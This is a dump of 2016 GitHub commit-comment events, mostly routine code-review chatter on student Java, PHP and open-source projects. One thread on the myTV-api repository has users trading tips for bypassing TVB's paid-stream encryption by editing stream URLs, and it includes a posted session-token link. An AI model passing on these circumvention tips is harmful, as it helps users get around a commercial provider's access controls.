{"id":"4613678073","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162281,"position":17,"line":17,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:00:13Z","updated_at":"2016-09-25T05:00:13Z","body":"The next letter in the alphabet after i is j."}},"created_at":"2016-09-25T05:00:13Z"}
{"id":"4613678154","type":"CommitCommentEvent","actor":{"login":"C6516"},"repo":{"name":"C3140/tcexam"},"payload":{"comment":{"id":19162282,"position":null,"line":null,"path":null,"commit_id":"4e04392d1333d1a050507ce2cc876b806331945f","created_at":"2016-09-25T05:00:15Z","updated_at":"2016-09-25T05:00:15Z","body":"111"}},"created_at":"2016-09-25T05:00:15Z"}
{"id":"4613679847","type":"CommitCommentEvent","actor":{"login":"lakb8"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162290,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:01:39Z","updated_at":"2016-09-25T05:01:39Z","body":"其实一开始我也以为改了加密方式，不过后来试了只要视频链接其中一个地方改为vipo，又可以看了"}},"created_at":"2016-09-25T05:01:39Z"}
{"id":"4613680293","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162291,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:02:05Z","updated_at":"2016-09-25T05:02:05Z","body":"THIS IS NOT THE MAIN METHOD!!!\r\nMay i refer you to lesson 1 from ICS3U."}},"created_at":"2016-09-25T05:02:05Z"}
{"id":"4613681640","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19162299,"position":44,"line":41,"path":"issue18/login.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-25T05:03:22Z","updated_at":"2016-09-25T05:03:22Z","body":"144bedb9cd4bae0815a222fc2f8a9e3b0558d397\r\n頂いたアドバイスに従い再度修正したところ、ハッシュ化、認証ともにうまくいくようになりました！\r\n上記にプッシュしましたので、ご確認頂ければ幸いでございます。"}},"created_at":"2016-09-25T05:03:22Z"}
{"id":"4613682352","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162300,"position":36,"line":36,"path":"Unit One/src/com/bayviewglen/queens/QueensInterface.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:04:03Z","updated_at":"2016-09-25T05:04:03Z","body":"`choice > 0`"}},"created_at":"2016-09-25T05:04:03Z"}
{"id":"4613683102","type":"CommitCommentEvent","actor":{"login":"jiacai2050"},"repo":{"name":"shoreleave/shoreleave-remote"},"payload":{"comment":{"id":19162301,"position":5,"line":25,"path":"src/shoreleave/remotes/http_rpc.cljs","commit_id":"4703d7c0ab79515aebb51340a805c3266a9b2448","created_at":"2016-09-25T05:04:47Z","updated_at":"2016-09-25T05:04:47Z","body":"Why change this ?\r\nshoreleave-remote-ring's `default-remote-uri` is still `_fetch`\r\n\r\nhttps://github.com/shoreleave/shoreleave-remote-ring/blob/master/src/cemerick/shoreleave/rpc.clj#L11\r\n\r\n"}},"created_at":"2016-09-25T05:04:47Z"}
{"id":"4613683420","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162302,"position":44,"line":44,"path":"Unit One/src/com/bayviewglen/queens/QueensInterface.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:05:08Z","updated_at":"2016-09-25T05:05:08Z","body":"This should be in the catch"}},"created_at":"2016-09-25T05:05:08Z"}
{"id":"4613684965","type":"CommitCommentEvent","actor":{"login":"hdfukuoka1985"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":19162306,"position":44,"line":41,"path":"issue18/login.php","commit_id":"df1870cffc8c2485d010c23815a4261ceb1ceab1","created_at":"2016-09-25T05:06:40Z","updated_at":"2016-09-25T05:06:40Z","body":"a3b651d5bb78a74ff1caff1a96cc046f7cbd8c7d\r\nすみません、データベースを忘れていました。"}},"created_at":"2016-09-25T05:06:40Z"}
{"id":"4613684985","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162307,"position":44,"line":44,"path":"Unit One/src/com/bayviewglen/queens/QueensInterface.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:06:41Z","updated_at":"2016-09-25T05:06:41Z","body":"what if the choice is just something like a negative\r\n"}},"created_at":"2016-09-25T05:06:41Z"}
{"id":"4613685587","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162311,"position":44,"line":44,"path":"Unit One/src/com/bayviewglen/queens/QueensInterface.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:07:17Z","updated_at":"2016-09-25T05:07:17Z","body":"oh yeah and i fixed the natural number, I changed something else but forgot about this print statement"}},"created_at":"2016-09-25T05:07:17Z"}
{"id":"4613686473","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162314,"position":44,"line":44,"path":"Unit One/src/com/bayviewglen/queens/QueensInterface.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:08:11Z","updated_at":"2016-09-25T05:08:11Z","body":"Oh wait I see what you did. Yeah this comment and the one above."}},"created_at":"2016-09-25T05:08:11Z"}
{"id":"4613686637","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162315,"position":36,"line":36,"path":"Unit One/src/com/bayviewglen/queens/QueensInterface.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:08:22Z","updated_at":"2016-09-25T05:08:22Z","body":"eh next time\r\n"}},"created_at":"2016-09-25T05:08:22Z"}
{"id":"4613686895","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162316,"position":5,"line":5,"path":"Unit One/src/com/bayviewglen/queens/QueensInterface.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:08:40Z","updated_at":"2016-09-25T05:08:40Z","body":"ahaha\r\n"}},"created_at":"2016-09-25T05:08:40Z"}
{"id":"4613687226","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162318,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:08:59Z","updated_at":"2016-09-25T05:08:59Z","body":"怎么改呢"}},"created_at":"2016-09-25T05:08:59Z"}
{"id":"4613687725","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162319,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:09:34Z","updated_at":"2016-09-25T05:09:34Z","body":"main as in the English definition of main,\"chief in size or importance\""}},"created_at":"2016-09-25T05:09:34Z"}
{"id":"4613688209","type":"CommitCommentEvent","actor":{"login":"ddugovic"},"repo":{"name":"ddugovic/RelayChess"},"payload":{"comment":{"id":19162320,"position":null,"line":null,"path":null,"commit_id":"3b83b681fa4e6ad077ad46c442c7563bfa33ae74","created_at":"2016-09-25T05:09:59Z","updated_at":"2016-09-25T05:09:59Z","body":"On my dev instance I'll use `relaychess.mooo.com` and `socket.relaychess.mooo.com` respectively."}},"created_at":"2016-09-25T05:09:59Z"}
{"id":"4613688948","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162322,"position":18,"line":18,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:10:39Z","updated_at":"2016-09-25T05:10:39Z","body":"the default value for booleans in arrays is false.\r\nnoted"}},"created_at":"2016-09-25T05:10:39Z"}
{"id":"4613689153","type":"CommitCommentEvent","actor":{"login":"jboursiquot"},"repo":{"name":"AchievementNetwork/vasco"},"payload":{"comment":{"id":19162323,"position":null,"line":null,"path":null,"commit_id":"9dfe6732baf9254b7929ae7278c36801fcc68d04","created_at":"2016-09-25T05:10:49Z","updated_at":"2016-09-25T05:10:49Z","body":"Yea, I'm still toying with it. There are some cases where I don't want the dependency. When deploying to staging for example, I don't want to build a new image and re-register a task definition. Instead, we'll just update the service that uses the task def to make use of the known-good revision which will already be present in the container registry."}},"created_at":"2016-09-25T05:10:49Z"}
{"id":"4613689257","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162324,"position":17,"line":17,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:10:54Z","updated_at":"2016-09-25T05:10:54Z","body":"i like k"}},"created_at":"2016-09-25T05:10:54Z"}
{"id":"4613689555","type":"CommitCommentEvent","actor":{"login":"Musilda"},"repo":{"name":"pavelevap/ceske-sluzby"},"payload":{"comment":{"id":19162326,"position":null,"line":null,"path":null,"commit_id":"80a0256a5414ddf873483ee6616ac0f4891b6cd7","created_at":"2016-09-25T05:11:13Z","updated_at":"2016-09-25T05:11:13Z","body":"Jo, to je svinstvo :-)"}},"created_at":"2016-09-25T05:11:13Z"}
{"id":"4613689644","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162327,"position":15,"line":15,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:11:19Z","updated_at":"2016-09-25T05:11:19Z","body":"...hgis"}},"created_at":"2016-09-25T05:11:19Z"}
{"id":"4613689816","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162328,"position":10,"line":10,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:11:30Z","updated_at":"2016-09-25T05:11:30Z","body":"no"}},"created_at":"2016-09-25T05:11:30Z"}
{"id":"4613691436","type":"CommitCommentEvent","actor":{"login":"calmh"},"repo":{"name":"syncthing/docs"},"payload":{"comment":{"id":19162330,"position":null,"line":null,"path":null,"commit_id":"0eaaa45027f774ef1b774fc58e7ac834954c0400","created_at":"2016-09-25T05:13:16Z","updated_at":"2016-09-25T05:13:16Z","body":"@nrm21 Good updates, but please use a more descriptive commit message in the future. :)"}},"created_at":"2016-09-25T05:13:16Z"}
{"id":"4613691540","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162331,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:13:22Z","updated_at":"2016-09-25T05:13:22Z","body":"@lakb8 怎么改呢"}},"created_at":"2016-09-25T05:13:22Z"}
{"id":"4613691597","type":"CommitCommentEvent","actor":{"login":"ChristopherAlexiev"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162332,"position":18,"line":18,"path":"Unit One/src/com/bayviewglen/queens/Queen.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:13:25Z","updated_at":"2016-09-25T05:13:25Z","body":"yeah, I don't even know why I still keep a row variable in Queen"}},"created_at":"2016-09-25T05:13:25Z"}
{"id":"4613692798","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19162333,"position":null,"line":null,"path":null,"commit_id":"de0833ff97f267828e5cb8c61013d8d2a7049a26","created_at":"2016-09-25T05:14:32Z","updated_at":"2016-09-25T05:14:32Z","body":"[Your benchmark job](https://github.com/JuliaLang/julia/commit/de0833ff97f267828e5cb8c61013d8d2a7049a26#commitcomment-19162095) has completed - possible performance regressions were detected. A full report can be found [here](https://github.com/JuliaCI/BaseBenchmarkReports/blob/ef74f58a8d55cb2d31613454750e2c79c71dc500/daily_2016_9_25/report.md). cc @jrevels"}},"created_at":"2016-09-25T05:14:32Z"}
{"id":"4613693906","type":"CommitCommentEvent","actor":{"login":"Guhhhhaa"},"repo":{"name":"JacksonTian/fks"},"payload":{"comment":{"id":19162334,"position":null,"line":null,"path":null,"commit_id":"5f4d583c434af889b29839a375b988320f6f2401","created_at":"2016-09-25T05:15:42Z","updated_at":"2016-09-25T05:15:42Z","body":"Idea Map.I didn't make it,I copied it."}},"created_at":"2016-09-25T05:15:42Z"}
{"id":"4613695053","type":"CommitCommentEvent","actor":{"login":"ivanbrennan"},"repo":{"name":"ivanbrennan/magit"},"payload":{"comment":{"id":19162335,"position":5,"line":505,"path":"lisp/magit.el","commit_id":"ef953927d4f2ff1d3c8db56541b53215dd635090","created_at":"2016-09-25T05:16:55Z","updated_at":"2016-09-25T05:16:55Z","body":"See https://github.com/magit/magit/commit/43be412085ec72db7b81580b12ef4a40ba7ee2e8, https://github.com/magit/magit/commit/65787d92910a77f0528fc4623c41af0e0b8e0e91, and https://github.com/magit/magit/issues/1769"}},"created_at":"2016-09-25T05:16:55Z"}
{"id":"4613695786","type":"CommitCommentEvent","actor":{"login":"lakb8"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162338,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:17:43Z","updated_at":"2016-09-25T05:17:43Z","body":"将链接其中mpsdrmv改为vipo,前提是你能获取到视频链接"}},"created_at":"2016-09-25T05:17:43Z"}
{"id":"4613697586","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162342,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:19:33Z","updated_at":"2016-09-25T05:19:33Z","body":"@lakb8 我现在是解析不出来，原来我是这样解析 http://token.tvb.com/stream/vod/rtmps/tvbcom/mytvsuper4/7706/770588/000001011296.mp4?feed"}},"created_at":"2016-09-25T05:19:33Z"}
{"id":"4613698555","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162345,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:20:39Z","updated_at":"2016-09-25T05:20:39Z","body":"@lakb8 大神能加你QQ私聊一下吗"}},"created_at":"2016-09-25T05:20:39Z"}
{"id":"4613701551","type":"CommitCommentEvent","actor":{"login":"BIGbozi"},"repo":{"name":"BIGbozi/Class-Desigh"},"payload":{"comment":{"id":19162352,"position":null,"line":null,"path":null,"commit_id":"8005ec9af538befdd82319a13ad3c5a0f58fc622","created_at":"2016-09-25T05:24:06Z","updated_at":"2016-09-25T05:24:06Z","body":"..."}},"created_at":"2016-09-25T05:24:06Z"}
{"id":"4613703312","type":"CommitCommentEvent","actor":{"login":"wleungBVG"},"repo":{"name":"ChristopherAlexiev/ICS4U"},"payload":{"comment":{"id":19162354,"position":28,"line":28,"path":"Unit One/src/com/bayviewglen/queens/Board.java","commit_id":"2fe8c9bf13c8eb3076d9130cd745fe364540e2ab","created_at":"2016-09-25T05:26:06Z","updated_at":"2016-09-25T05:26:06Z","body":"Well then try running your program without the method called main."}},"created_at":"2016-09-25T05:26:06Z"}
{"id":"4613703863","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162356,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:26:43Z","updated_at":"2016-09-25T05:26:43Z","body":"@lakb8 我是下载，不是在线看"}},"created_at":"2016-09-25T05:26:43Z"}
{"id":"4613705648","type":"CommitCommentEvent","actor":{"login":"brittainmedia"},"repo":{"name":"stefan-loewe/WinBinder"},"payload":{"comment":{"id":19162358,"position":null,"line":null,"path":null,"commit_id":"7435b517be103c6ba68e57573185b0d373a16466","created_at":"2016-09-25T05:28:38Z","updated_at":"2016-09-25T05:28:38Z","body":"I think I've tried https://docs.google.com/uc?authuser=0&id=0B76nq_y0gvBpcHVuR003UlRIZnM&export=download in the past. It threw a lot of of errors and foreign characters out. but did work.\r\n\r\nWhat is it you've migrated over from this?"}},"created_at":"2016-09-25T05:28:38Z"}
{"id":"4613705862","type":"CommitCommentEvent","actor":{"login":"bluejamesbond"},"repo":{"name":"bluejamesbond/radiant-player-mac"},"payload":{"comment":{"id":19162359,"position":null,"line":null,"path":null,"commit_id":"d730d1933e4a67511d43b52871b29c879aa6fcd0","created_at":"2016-09-25T05:28:52Z","updated_at":"2016-09-25T05:28:52Z","body":"https://github.com/radiant-player/radiant-player-mac/issues/613\r\n\r\nAdded preference and background-filter css check.\r\n\r\n![image](https://cloud.githubusercontent.com/assets/376453/18813197/41b3d56a-82a6-11e6-9a4c-b93451bf4477.png)\r\n"}},"created_at":"2016-09-25T05:28:52Z"}
{"id":"4613709794","type":"CommitCommentEvent","actor":{"login":"lakb8"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162385,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:32:39Z","updated_at":"2016-09-25T05:32:39Z","body":"也可以下载的，用idm或者hls,只要你能获取到视频链接"}},"created_at":"2016-09-25T05:32:39Z"}
{"id":"4613710118","type":"CommitCommentEvent","actor":{"login":"ishantvivek"},"repo":{"name":"google-aosp/android_frameworks_av"},"payload":{"comment":{"id":19162386,"position":null,"line":null,"path":null,"commit_id":"d8d4994ad2e9bfcb39982e55b177b3f9424fcffc","created_at":"2016-09-25T05:33:00Z","updated_at":"2016-09-25T05:33:00Z","body":"Check my DU-M commits of frameworks_av for using in 6.0"}},"created_at":"2016-09-25T05:33:00Z"}
{"id":"4613712207","type":"CommitCommentEvent","actor":{"login":"jaredallard"},"repo":{"name":"stefan-loewe/WinBinder"},"payload":{"comment":{"id":19162390,"position":null,"line":null,"path":null,"commit_id":"7435b517be103c6ba68e57573185b0d373a16466","created_at":"2016-09-25T05:35:10Z","updated_at":"2016-09-25T05:35:10Z","body":"I'm not 100% sure what's the topic here\r\n\r\nOn Sat, Sep 24, 2016, 10:30 PM Stefan Brittain <notifications@github.com<mailto:notifications@github.com>> wrote:\r\n\r\nI think I've tried https://docs.google.com/uc?authuser=0&id=0B76nq_y0gvBpcHVuR003UlRIZnM&export=download in the past. It threw a lot of of errors and foreign characters out. but did work.\r\n\r\nWhat is it you've migrated over from this?\r\n\r\n—\r\nYou are receiving this because you authored the thread.\r\nReply to this email directly, view it on GitHub<https://github.com/stefan-loewe/WinBinder/commit/7435b517be103c6ba68e57573185b0d373a16466#commitcomment-19162358>, or mute the thread<https://github.com/notifications/unsubscribe-auth/ACR9NYW-8krAuAM00A9qip3YsaTdo2vAks5qtgaHgaJpZM4KFwFp>.\r\n"}},"created_at":"2016-09-25T05:35:10Z"}
{"id":"4613712762","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162391,"position":null,"line":null,"path":null,"commit_id":"5b519ed6791ff0ba43efc12ec338b9a5aec47f5f","created_at":"2016-09-25T05:35:48Z","updated_at":"2016-09-25T05:35:48Z","body":"@hklcf 同问，下载老方法下载不了了，求大神讲解"}},"created_at":"2016-09-25T05:35:48Z"}
{"id":"4613714659","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162398,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:37:47Z","updated_at":"2016-09-25T05:37:47Z","body":"@lakb8 你现在还能下？"}},"created_at":"2016-09-25T05:37:47Z"}
{"id":"4613717123","type":"CommitCommentEvent","actor":{"login":"autumnboo90"},"repo":{"name":"stylelint/stylelint"},"payload":{"comment":{"id":19162407,"position":null,"line":null,"path":null,"commit_id":"74b56623aec109978875e934eaa474472dc77a77","created_at":"2016-09-25T05:40:30Z","updated_at":"2016-09-25T05:40:30Z","body":"❤"}},"created_at":"2016-09-25T05:40:30Z"}
{"id":"4613718466","type":"CommitCommentEvent","actor":{"login":"mavrothal"},"repo":{"name":"puppylinux-woof-CE/woof-CE"},"payload":{"comment":{"id":19162413,"position":null,"line":null,"path":null,"commit_id":"81d8d031482691f7d0f62d56ef41a29dc85049bd","created_at":"2016-09-25T05:42:06Z","updated_at":"2016-09-25T05:42:06Z","body":"Here is where a good commit message would be important 😉 \r\nWhy someone that is looking for help should be furthered asked if (s)he wants to open a specific - index - file that contains the helpful info? \r\nWhat the user suppose to make of this? \r\nIs (s)he suppose to understand that the html suffix means opening a browser (not necessarily)? \r\nAnd if the user does figure out that you are asking if (s)he is OK to open a browser, what are the options? Not to get help?\r\nAbove all, why? \r\nIs this a \"security\" thing? \r\nIf it is, the question should be \"Help will open a browser and although the file is local your browser may automatically connect to a number of servers\". \r\nIf this indeed is the concern instead of freaking out the new user (the one that looks for help in first boot is likely to be new - and in 99.9% of the cases will open a browser latter and connect all over the place as intended by the browser developers) just hard code a simple html viewer instead of the default browser, or at least check that there is a connection at the time (and that firewall is down) before asking.\r\nIf the puppy_help function has another purpose, apologies for all of the above but please explain.\r\n"}},"created_at":"2016-09-25T05:42:06Z"}
{"id":"4613721116","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162419,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:45:13Z","updated_at":"2016-09-25T05:45:13Z","body":"@lakb8  有没有一脚踢得 这样麻烦"}},"created_at":"2016-09-25T05:45:13Z"}
{"id":"4613721553","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162420,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:45:44Z","updated_at":"2016-09-25T05:45:44Z","body":"@lakb8 session: http://202.126.56.114/session/383734c2-82e3-11e6-95d1-0050569012dd/kqb4nk/mytvsuper5//10509//000001050858.mp4?token=9f10fe2805eca0ef7f3a5a80d6d7046d_1474782609_1474782609. Download???"}},"created_at":"2016-09-25T05:45:44Z"}
{"id":"4613722646","type":"CommitCommentEvent","actor":{"login":"lakb8"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162422,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:46:56Z","updated_at":"2016-09-25T05:46:56Z","body":"能下，是要session，所以我也是手动操作找出链接，一个个下的"}},"created_at":"2016-09-25T05:46:56Z"}
{"id":"4613723542","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162425,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:47:59Z","updated_at":"2016-09-25T05:47:59Z","body":"@lakb8 麻烦给个样板"}},"created_at":"2016-09-25T05:47:59Z"}
{"id":"4613723755","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162426,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:48:13Z","updated_at":"2016-09-25T05:48:13Z","body":"@lakb8 那样累 还以为一脚踢"}},"created_at":"2016-09-25T05:48:13Z"}
{"id":"4613724999","type":"CommitCommentEvent","actor":{"login":"popolihu123"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162427,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:49:38Z","updated_at":"2016-09-25T05:49:38Z","body":"@liuhui19994 lakb8  麻烦刚刚评论删下 不然TVB又要封杀"}},"created_at":"2016-09-25T05:49:38Z"}
{"id":"4613727056","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162431,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:52:02Z","updated_at":"2016-09-25T05:52:02Z","body":"@popolihu123 已删，你会了吗\r\n"}},"created_at":"2016-09-25T05:52:02Z"}
{"id":"4613727313","type":"CommitCommentEvent","actor":{"login":"TheComputerGuy96"},"repo":{"name":"google-aosp/android_frameworks_av"},"payload":{"comment":{"id":19162433,"position":null,"line":null,"path":null,"commit_id":"d8d4994ad2e9bfcb39982e55b177b3f9424fcffc","created_at":"2016-09-25T05:52:19Z","updated_at":"2016-09-25T05:52:19Z","body":"But I'm working on pure AOSP like you (but with AOSP 7.0)"}},"created_at":"2016-09-25T05:52:19Z"}
{"id":"4613727772","type":"CommitCommentEvent","actor":{"login":"singhpraveen04"},"repo":{"name":"singhpraveen04/integration-test-repo-demo"},"payload":{"comment":{"id":19162434,"position":null,"line":null,"path":null,"commit_id":"f03329c36c4e3a7af7c2dab67db0427a9953b3bb","created_at":"2016-09-25T05:52:48Z","updated_at":"2016-09-25T05:52:48Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Integrate a commit with trello](https://trello.com/c/wRSHtvU9/3-integrate-a-commit-with-trello)"}},"created_at":"2016-09-25T05:52:48Z"}
{"id":"4613727804","type":"CommitCommentEvent","actor":{"login":"huahua333"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162435,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:52:51Z","updated_at":"2016-09-25T05:52:51Z","body":"@lakb8  你是手機抓包一個個下載嗎?"}},"created_at":"2016-09-25T05:52:51Z"}
{"id":"4613728390","type":"CommitCommentEvent","actor":{"login":"tokentvb"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162438,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:53:31Z","updated_at":"2016-09-25T05:53:31Z","body":"\r\nI only studied up to the sessison. Also, I do not know download"}},"created_at":"2016-09-25T05:53:31Z"}
{"id":"4613728444","type":"CommitCommentEvent","actor":{"login":"huahua333"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162439,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:53:35Z","updated_at":"2016-09-25T05:53:35Z","body":"那個累...."}},"created_at":"2016-09-25T05:53:35Z"}
{"id":"4613728485","type":"CommitCommentEvent","actor":{"login":"JuanIrizo"},"repo":{"name":"JuanIrizo/DeCorruptor"},"payload":{"comment":{"id":19162440,"position":1,"line":1,"path":"README.md","commit_id":"37b4e66e7e02a5d22e8904ab42015eabc00fb615","created_at":"2016-09-25T05:53:37Z","updated_at":"2016-09-25T05:53:37Z","body":"juego que simule las apuestas deportivas online\r\n"}},"created_at":"2016-09-25T05:53:37Z"}
{"id":"4613728781","type":"CommitCommentEvent","actor":{"login":"liuhui19994"},"repo":{"name":"hklcf/myTV-api"},"payload":{"comment":{"id":19162441,"position":null,"line":null,"path":null,"commit_id":"c687d4c32fb85233f98ef17109d900222ce5696b","created_at":"2016-09-25T05:53:54Z","updated_at":"2016-09-25T05:53:54Z","body":"@lakb8 大神给个联系方式，私下讨论"}},"created_at":"2016-09-25T05:53:54Z"}
{"id":"4613729516","type":"CommitCommentEvent","actor":{"login":"patriotyk"},"repo":{"name":"django/django"},"payload":{"comment":{"id":19162445,"position":16,"line":137,"path":"django/forms/boundfield.py","commit_id":"fab46ce6f5a0a58c4e5e39c9e5e412702beb4a64","created_at":"2016-09-25T05:54:43Z","updated_at":"2016-09-25T05:54:43Z","body":"Sorry, It was a mistake. I already removed this comment"}},"created_at":"2016-09-25T05:54:43Z"}
